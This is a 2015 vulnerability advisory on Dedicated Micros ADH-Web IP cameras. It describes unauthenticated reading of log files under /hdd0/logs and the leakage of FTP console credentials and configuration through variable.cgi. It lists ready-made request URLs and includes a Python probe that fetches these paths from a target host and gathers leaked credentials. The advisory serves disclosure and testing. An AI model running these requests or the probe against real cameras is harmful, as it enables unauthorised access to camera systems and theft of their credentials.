1. Advisory Information

Title: ADH-Web Server IP-Cameras Improper Access Restrictions
EDB-ID: 38245
Advisory ID: OLSA-2015-0919
Advisory URL: http://www.orwelllabs.com/2015/10/adh-web-server-ip-cameras-improper.html
Date published: 2015-09-19
Date of last update: 2016-02-15
Vendors contacted: Dedicated Micros


2. Vulnerability Information

Class: Information Exposure [CWE-200]
Impact: Access Control Bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: N/A


3. Vulnerability Description

Due to improper access restrictions, the ADH-Web device [1] allows a remote attacker to read arbitrary files under the directory '/hdd0/logs' without authentication. A considerable amount of additional information (useful during the fingerprinting step) can also be obtained through the 'variable' parameter of the variable.cgi script [2].

Background:

Dedicated Micros’ ground breaking Closed IPTV solution makes deploying an IP Video, CCTV system safe, secure and simple. Combining patent-pending innovation with zeroconf networking technology, Closed IPTV automatically allocates IP addresses to IP cameras by physical port. In this way the system is completely deterministic, creating firewalls and monitoring IP connections by individual network ports so they cannot be hacked or intercepted. This ground breaking solution provides a very simple and secure answer to IP Video, meaning that no prior knowledge of IP networking is required. Sophisticated and Dependable network security can be achieved with a single click.


4. Vulnerable Packages

- SD Advanced Closed IPTV
- SD Advanced
- EcoSense
- Digital Sprite 2


5. Technical Description

[1] The directory index itself is protected against unauthenticated access (a request for it returns 401 Unauthorized), but the files inside it can be fetched directly without any authentication, as the two requests below show:

(401): http://<target_ip>/hdd0/logs
(200): http://<target_ip>/hdd0/logs/log.txt

> Most common logfiles:

arc_log.txt
bak.txt
connect.txt
log.txt
seclog.log
startup.txt
DBGLOG.TXT
access.txt
security.txt

[2] Another problem identified is an information exposure via the 'variable' parameter of the variable.cgi script. Knowing the variable names, an unauthenticated request can extract a reasonable amount of information:

> DNS:
http://target_ip/variable.cgi?variable=dhcp_dns&slaveip=0.0.0.0

> master FTP console credentials:
http://target_ip/variable.cgi?variable=console_master_ftpuser&slaveip=0.0.0.0
http://target_ip/variable.cgi?variable=console_master_ftppass&slaveip=0.0.0.0

(although the vast majority of servers have ftp/telnet with anonymous access allowed.)

> alarms:
http://target_ip/variable.cgi?variable=alarm_title&slaveip=0.0.0.0

> camconfig:
http://target_ip/variable.cgi?variable=camconfig[0]&slaveip=127.0.0.1

(the list above includes, but is not limited to, the variables that can be read this way)

The server also sends credentials (and other sensitive data) via GET parameters. This is poor practice, as the URL is liable to be logged in any number of places between the customer and the camera; credentials should be passed in the body of a POST request, and over SSL/TLS, which is not the case here. It is possible to create, edit and delete users and other configuration in this way, which makes for very dangerous CSRF vectors.


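The probe below is an added example written for this page; it is not part of the Orwelllabs advisory nor any Dedicated Micros software. It checks both issues described in section 5 against one host: [1] whether /hdd0/logs returns 401 while the log files named above are readable without credentials, and [2] which of the variable.cgi variables listed above answer an unauthenticated request. The paths, file names and variable names are the ones the advisory gives; the advisory does not show the response format of variable.cgi, so the body is reported verbatim. The HTTP transport is injected so the logic can run offline: the fake_fetch responses, the host 192.0.2.10 and the credential values inside it are constructed to mirror the advisory's observations and were not captured from a real device.

```python
"""Unauthenticated probe for the two ADH-Web issues described in the advisory.

Added example, not the advisory's own code. The device behaviour modelled
in fake_fetch is constructed from the advisory's description, not observed.
"""
import json
import sys
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Tuple
from urllib.parse import quote, urljoin

# File names from the advisory's "Most common logfiles" list.
LOG_FILES: List[str] = [
    "arc_log.txt", "bak.txt", "connect.txt", "log.txt", "seclog.log",
    "startup.txt", "DBGLOG.TXT", "access.txt", "security.txt",
]

# variable.cgi variables named in the advisory, with the slaveip value it uses.
VARIABLES: List[Tuple[str, str]] = [
    ("dhcp_dns", "0.0.0.0"),
    ("console_master_ftpuser", "0.0.0.0"),
    ("console_master_ftppass", "0.0.0.0"),
    ("alarm_title", "0.0.0.0"),
    ("camconfig[0]", "127.0.0.1"),
]

# Variables whose exposure hands an attacker credentials outright.
CREDENTIAL_VARIABLES = {"console_master_ftpuser", "console_master_ftppass"}

Fetch = Callable[[str], Tuple[int, bytes]]


def http_fetch(url: str, timeout: float = 5.0) -> Tuple[int, bytes]:
    """Real transport: plain GET with no credentials, returns (status, body)."""
    req = urllib.request.Request(url, headers={"User-Agent": "adh-probe"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


def probe(base_url: str, fetch: Fetch = http_fetch) -> Dict[str, object]:
    """Report what one ADH-Web host serves to an unauthenticated client."""
    base = base_url.rstrip("/") + "/"

    # [1] The advisory's pattern: index gated with 401, files inside it not.
    index_status, _ = fetch(urljoin(base, "hdd0/logs"))
    readable_logs: List[Tuple[str, int]] = []
    for name in LOG_FILES:
        status, body = fetch(urljoin(base, "hdd0/logs/" + name))
        if status == 200:
            readable_logs.append((name, len(body)))

    # [2] variable.cgi: any 200 with a non-empty body is an exposure.
    exposed: Dict[str, str] = {}
    leaked_credentials: Dict[str, str] = {}
    for var, slaveip in VARIABLES:
        query = "variable.cgi?variable=%s&slaveip=%s" % (quote(var, safe="[]"), slaveip)
        status, body = fetch(urljoin(base, query))
        value = body.decode("latin-1").strip()  # format not documented; keep verbatim
        if status == 200 and value:
            exposed[var] = value
            if var in CREDENTIAL_VARIABLES:
                leaked_credentials[var] = value

    return {
        "index_protected": index_status == 401,
        "readable_logs": readable_logs,
        "exposed_variables": exposed,
        "leaked_credentials": leaked_credentials,
        "access_control_bypass": index_status == 401 and bool(readable_logs),
    }


def fake_fetch(url: str) -> Tuple[int, bytes]:
    """Constructed stand-in for a device behaving as the advisory describes."""
    path = url.split("://", 1)[1].split("/", 1)[1]  # drop scheme and host
    if path == "hdd0/logs":
        return 401, b"Unauthorized"
    if path.startswith("hdd0/logs/"):
        name = path[len("hdd0/logs/"):]
        if name in ("log.txt", "connect.txt", "startup.txt"):
            return 200, b"constructed log line\n"
        return 404, b""
    if path.startswith("variable.cgi?"):
        params = dict(p.split("=", 1) for p in path.split("?", 1)[1].split("&"))
        answers = {  # constructed values, not from a real device
            "dhcp_dns": b"dhcp_dns=192.0.2.53",
            "console_master_ftpuser": b"console_master_ftpuser=ftpadmin",
            "console_master_ftppass": b"console_master_ftppass=s3cret",
            "alarm_title": b"",
        }
        return 200, answers.get(params.get("variable", ""), b"")
    return 404, b""


if __name__ == "__main__":
    # Usage: python adh_probe.py http://<target_ip>   (no argument: offline demo)
    if len(sys.argv) > 1:
        print(json.dumps(probe(sys.argv[1], http_fetch), indent=2))
    else:
        print(json.dumps(probe("http://192.0.2.10", fake_fetch), indent=2))
```

The access_control_bypass flag is set only when the index answers 401 and at least one file answers 200, so a device whose whole directory is open, or one that is properly locked down, is reported differently from the exact pattern the advisory describes. Treat any entry in leaked_credentials as a critical finding during a test, independent of how the vendor rates the log exposure.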
6. Vendor Information, Solutions and Workarounds

The vendor found that some of these items are not vulnerabilities (sensitive information via GET, for example), that others are useless to an attacker (hardcoded credentials) and that others are not yet so critical (access to server logs). I think that at least this information can assist during an intrusion test, as will be shown soon.


7. Credits

These vulnerabilities have been discovered by Orwelllabs.


8. Report Timeline

2015-08-31: Vendor has been notified about the vulnerabilities (without details yet).
2015-09-01: Vendor acknowledges receipt of the email and asks for technical details.
2015-09-01: An email with technical details is sent to the vendor.
2015-09-11: Still no response; another email was sent to the vendor requesting any opinion on the reported problems.
2015-09-11: The vendor reported that the matter was passed on to the development team and that it would contact me the following week (2015-09-14).

2015-09-14: The development team responded with its assessment of the reported points; according to this response the impact of these vulnerabilities is low, and the items are no longer available unauthenticated in the recent software release (version 10212).


Legal Notices
+++++++++++++
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of this information.


About Orwelllabs
++++++++++++++++
Orwelllabs is a security research lab interested in embedded device & webapp hacking.
We aim to create some intelligence around this vast and confusing picture that is the Internet of things.


-----BEGIN PGP PUBLIC KEY BLOCK-----

mQENBFcJl8wBCAC/J8rAQdOoC82gik6LVbH674HnxAAQ6rBdELkyR2S2g1zMIAFt
xNN//A3bUWwFtlrfgiJkiOC86FimPus5O/c4iZc8klm07hxWuzoLPzBPM50+uGKH
xZwwLa5PLuuR1T0O+OFqd9sdltz6djaYrFsdq6DZHVrp31P7LqHHRVwN8vzqWmSf
55hDGNTrjbnmfuAgQDrjA6FA2i6AWSTXEuDd5NjCN8jCorCczDeLXTY5HuJDb2GY
U9H5kjbgX/n3/UvQpUOEQ5JgW1QoqidP8ZwsMcK5pCtr9Ocm+MWEN2tuRcQq3y5I
SRuBk/FPhVVnx5ZrLveClCgefYdqqHi9owUTABEBAAG0IU9yd2VsbExhYnMgPG9y
d2VsbGxhYnNAZ21haWwuY29tPokBOQQTAQgAIwUCVwmXzAIbAwcLCQgHAwIBBhUI
AgkKCwQWAgMBAh4BAheAAAoJELs081R5pszAhGoIALxa6tCCUoQeksHfR5ixEHhA
Zrx+i3ZopI2ZqQyxKwbnqXP87lagjSaZUk4/NkB/rWMe5ed4bHLROf0PAOYAQstE
f5Nx2tjK7uKOw+SrnnFP08MGBQqJDu8rFmfjBsX2nIo2BgowfFC5XfDl+41cMy9n
pVVK9qHDp9aBSd3gMc90nalSQTI/QwZ6ywvg+5/mG2iidSsePlfg5d+BzQoc6SpW
LUTJY0RBS0Gsg88XihT58wnX3KhucxVx9RnhainuhH23tPdfPkuEDQqEM/hTVlmN
95rV1waD4+86IWG3Zvx79kbBnctD/e9KGvaeB47mvNPJ3L3r1/tT3AQE+Vv1q965
AQ0EVwmXzAEIAKgsUvquy3q8gZ6/t6J+VR7ed8QxZ7z7LauHvqajpipFV83PnVWf
ulaAIazUyy1XWn80bVnQ227fOJj5VqscfnHqBvXnYNjGLCNMRix5kjD/gJ/0pm0U
gqcrowSUFSJNTGk5b7Axdpz4ZyZFzXc33R4Wvkg/SAvLleU40S2wayCX+QpwxlMm
tnBExzgetRyNN5XENATfr87CSuAaS/CGfpV5reSoX1uOkALaQjjM2ADkuUWDp6KK
6L90h8vFLUCs+++ITWU9TA1FZxqTl6n/OnyC0ufUmvI4hIuQV3nxwFnBj1Q/sxHc
TbVSFcGqz2U8W9ka3sFuTQrkPIycfoOAbg0AEQEAAYkBHwQYAQgACQUCVwmXzAIb
DAAKCRC7NPNUeabMwLE8B/91F99flUVEpHdvy632H6lt2WTrtPl4ELUy04jsKC30
MDnsfEjXDYMk1GCqmXwJnztwEnTP17YO8N7/EY4xTgpQxUwjlpah++51JfXO58Sf
Os5lBcar8e82m1u7NaCN2EKGNEaNC1EbgUw78ylHU3B0Bb/frKQCEd60/Bkv0h4q
FoPujMQr0anKWJCz5NILOShdeOWXIjBWxikhXFOUgsUBYgJjCh2b9SqwQ2UXjFsU
I0gn7SsgP0uDV7spWv/ef90JYPpAQ4/tEK6ew8yYTJ/omudsGLt4vl565ArKcGwB
C0O2PBppCrHnjzck1xxVdHZFyIgWiiAmRyV83CiOfg37
=IZYl
-----END PGP PUBLIC KEY BLOCK-----